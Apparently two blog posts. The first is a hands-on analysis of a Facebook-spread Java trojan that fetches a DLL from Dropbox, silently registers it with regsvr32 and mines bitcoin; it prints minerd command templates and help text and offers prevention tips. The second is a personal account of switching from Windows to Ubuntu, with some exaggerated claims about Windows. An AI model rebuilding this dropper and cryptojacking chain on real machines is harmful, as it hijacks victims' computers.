vampire@linux:~/Documents/analysis$ file Form\_0320.jar
Form\_0320.jar: Zip archive data, at least v2.0 to extract
vampire@linux:~/Documents/analysis$ unzip Form\_0320.jar
 Archive:  Form\_0320.jar
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
  inflating: CNQNYPYFEBMJTHYPMGR.class         
vampire@linux:~/Documents/analysis$ ls
Form\_0320.jar  Form\_0320.ZIP  CNQNYPYFEBMJTHYPMGR.class  META-INF

Note: I am analysing Form_0320.ZIP.

Decompiling and analysing the java class file

Next I decompiled the class file using the jad tool.

vampire@linux:~/Documents/analysis$ jad CNQNYPYFEBMJTHYPMGR.class 
Parsing CNQNYPYFEBMJTHYPMGR.class...The class file version is 51.0 (only 45.3, 46.0 and 47.0 are supported)
  Generating CNQNYPYFEBMJTHYPMGR.jad

It created CNQNYPYFEBMJTHYPMGR.jad which contains the source code for the java program. The resulting code was pretty much obscure. All Strings were stored as int arrays of ascii codes. The arrays were dynamically converted to String within the code. I present here an easy to understand version of the code.

Instead of going through the code liny by line I will explain the whole code at once. The program tries to download a certain file from a dropbox link. The same file has multiple links so that if one fails the others might work. If it get’s a successfull HTTP response code it downloads the file to C:\temp\NWQGHJ.MXZ. The program then register’s it to windows using the regsvr32 command line operation running in silent mode (/s). So what I did was that I downloaded the file(d.dat) manually from the dropbox link and ran a filecommand with it.

vampire@linux:~/Documents/analysis$ file d.dat
d.dat: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

This shows that the file is a Windows DLL file.

Analysing the DLL file

I tried a few ways at first which seem to be leading to nothing, including strings and objdump. Later I renamed it to d.dll(did that to make sure my antivirus on windows finds it) and switched over to windows. Here’s a snapshot of what my antivirus found:

Hence it somehow connects the dll with the windows process explorer.exe. This process is the one used to browse the files in a computer. Next I used strings command and stored the result in a file.

vampire@linux:~/Documents/analysis$ strings d.dat > file

Then I opened the file in a text editor and searched for .exe. This resulted in two matches:

minerd.exe
explorer.exe

Seems to be getting somewhere. Browsing through the 59252 lines I found the following two snippets:

explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t 1 -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t 1 -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1  

and this one:

Usage: minerd [OPTIONS]
Options:
  -a, --algo=ALGO       specify the algorithm to use
                          scrypt    scrypt(1024, 1, 1) (default)
                          sha256d   SHA-256d
  -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)
  -O, --userpass=U:P    username:password pair for mining server
  -u, --user=USERNAME   username for mining server
  -p, --pass=PASSWORD   password for mining server
      --cert=FILE       certificate for mining server using SSL
  -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy
  -t, --threads=N       number of miner threads (default: number of processors)
  -r, --retries=N       number of times to retry if a network call fails
                          (default: retry indefinitely)
  -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)
  -T, --timeout=N       network timeout, in seconds (default: 270)
  -s, --scantime=N      upper bound on time spent scanning current work when
                          long polling is unavailable, in seconds (default: 5)
      --no-longpoll     disable X-Long-Polling support
      --no-stratum      disable X-Stratum support
  -q, --quiet           disable per-thread hashmeter output
  -D, --debug           enable debug output
  -P, --protocol-dump   verbose dump of protocol-level activities
      --benchmark       run in offline benchmark mode
  -c, --config=FILE     load a JSON-format configuration file
  -V, --version         display version information and exit
  -h, --help            display this help text and exit

I searched about minerd.exe on the internet and found out this:

minerd.exe is a part of multi-threaded CPU miner for Bitcoin crypto-currency system. Very often this application causes CPU usage to go to 90% or even more. Needles to say it’s not essential for Windows and may cause problems. If you knowingly installed this Bitcoin miner on your computer then there’s nothing to worry about. Even if you antivirus says it’s a trojan horse it’s probably a false positive. However, cyber crooks and fraudsters are using this software to earn some extra money as well by monetizing botnets. They drop the main mining modules on infected computers and start mining. They usually set low mining speed, so that the minerd.exe process only uses unused CPU cycles.

So basically this file uses the CPU to mine for bitcoins. It is a core part of the bit coin virus. But it doesn’t stop here. The file further sends the same message to other people on facebook. In case they open it, the same thing happens again. In this way a botnet(collection of programs communicating over a network with other similar programs to perform tasks) is set by the attacker to mine the bitcoins!

Summary

In short this trojan does the following things:

The victim receives a message on facebook. The message contains a zip file and a text message(lol) so that the victim is eager to open it.
Inside the zip file is a jar file which the user opens again without suspecting anything.
The jar file downloads a dll file from a dropbox link to the local hard disk and registers it to windows.
This file then sends the same message to all the friends of the victim on facebook and simultaneously starts mining for bitcoins.
Within a short span of time a botnet of victims is set up.

Preventive Measures

Never open a file of which you are not sure.
Confirm with your friend whether he has sent it or not.(preferably using a different communication channel)
Always have an updated antivirus program running on your windows machine.

Shifting to Ubuntu

2014-05-23T00:00:00+00:00

Initial days…

I had started coding on Windows. I began to get familiar with the graphical interfaces of NetBeans, Visual Studio, Eclipse etc. As I got to know more about programming and developing I began to hear about a certain thing called ‘linux’. This word kept popping out in many articles of stackoverflow or other resources that I used to depend upon. At first the name gave me the image of a computer with a pitch black screen with just plain text appearing on it. I then came to know about the power of the linux terminal. As I already had a little experience with bash scripting in Windows command prompt, I began to realize the usefullness of such an operating system. But due to my busy schedule I couldn’t delve further in this topic at that time.

A few years later one of my friends told me that she had installed Ubuntu on her desktop PC. I knew it was one of the Linux distribution. Then she started comparing it with Windows. This increased my interest in Ubuntu and I began to think of switching to it from Windows. I also heard from some other resource that the graphical interface of Ubuntu is sufficient for people to start working on it without any prior experiences. This set my mind and I finally installed Ubuntu in parallel with Windows.

Switching over…

During the initial days I started to use the graphical interface of Ubuntu for my work. Side by side using various references I got to know more and more about the terminal. Although it took me around a full week to download all my softwares required for various programming languages and to get them working right, I learned a lot about Ubuntu. From then on I used to code in Ubuntu while did other work in Windows. Within a few weeks I had started using the terminal excessively. I had stopped using IDEs and used the text editor ‘gedit’ and terminal instead for compiling and running programs. Within another few months I stopped using Windows entirely except for very few softwares for whom I couldn’t find replacements in Ubuntu.

Some features of Linux over Windows:

Customizability: The customizability of Linux is virtually limitless. If you don’t like something you simply change it.
Stability: linux operating systems are much much more stable than Windows. You could leave a Linux desktop on for several months without any performance degradation. In case you leave Windows on for even a few days it starts crashing.
Perfomance: Resource management of Linux is pretty good. It knows how to allocate proper memory and utilize the processor more efficiently than Windows.
Developing: If you are a developer then no doubt you SHOULD use linux. There are a whole bunch of tools that you would be missing out on in Windows. Apart from that developing any application is much more easier in Linux than in Windows. I’d like to give you an instance of it - When I had started learning PHP in my Windows days, I had a lot of trouble in setting up PHP server on my pc. I was so fed up that I completely removed it. Infact I used to host my PHP pages on a free PHP hosting website. Imagine the time it took me to make any change. I first made changes in my files locally then used ftp to transfer them to the server(which was running apache on linux). Instead when I had to use PHP on Ubuntu it hardly took me 3-5 minutes to get LAMP(Linux-Apache-MySql-PHP) installed. All I had to do to view my changes was to press the refresh button!
Price: Linux is completely free!
Terminal: The linux terminal is extremely more powerful than the Windows command prompt. I could do tons of things using extremely short commands.

Present situation…

Currently I do practically all my work using the terminal. Whenever I open my laptop my first keys are Ctrl-Alt-t which opens the terminal and last keys are sudo shutdown -h now which shut downs the laptop. I’ve started loving it. Now I even download files, download videos from youtube, send mails and use facebook(yeah even this!) using the terminal. It has made things much easier and systematic. Imagine liking and commenting on 100+ posts on your birthday and compare it with hardly a few commands at the terminal doing the same thing. It saves a lot of time. Apart from that I use ‘Sublime Text 2’ for writing code, ‘vim’ when I need to change a few lines and ‘chromium web browser’ for browsing the web.